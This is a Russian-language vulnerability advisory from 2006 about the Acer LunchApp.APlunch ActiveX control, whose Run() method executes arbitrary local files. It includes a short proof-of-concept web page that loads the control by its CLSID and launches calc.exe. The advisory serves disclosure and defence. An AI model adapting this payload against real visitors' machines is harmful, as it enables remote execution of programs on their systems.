Дата публикации: | 21.11.2006 |
Всего просмотров: | 1464 |
Опасность: | Высокая |
Наличие исправления: | Инстуркции по устранению |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Acer LunchApp.APlunch ActiveX Control 1.x |
Уязвимые версии: Acer LunchApp.APlunch ActiveX 1.0.0.0, возможно более ранние версии.
Описание: Уязвимость существует из-за того, что приложение использует небезопасный метод "Run()", который выполняет произвольные файлы, переданные ему в качестве аргумента. Удаленный пользователь может с помощью специально сформированной Web страницы выполнить произвольные локальные приложения не целевой системе. Пример:
<html> <body> <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha"> </object> <script> hahaha.Run("c", "\\windows\\system32\\calc.exe", ""); </script> </body> </html> Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | About Acer Notebook LunchApp.APlunch ActiveX Control.... |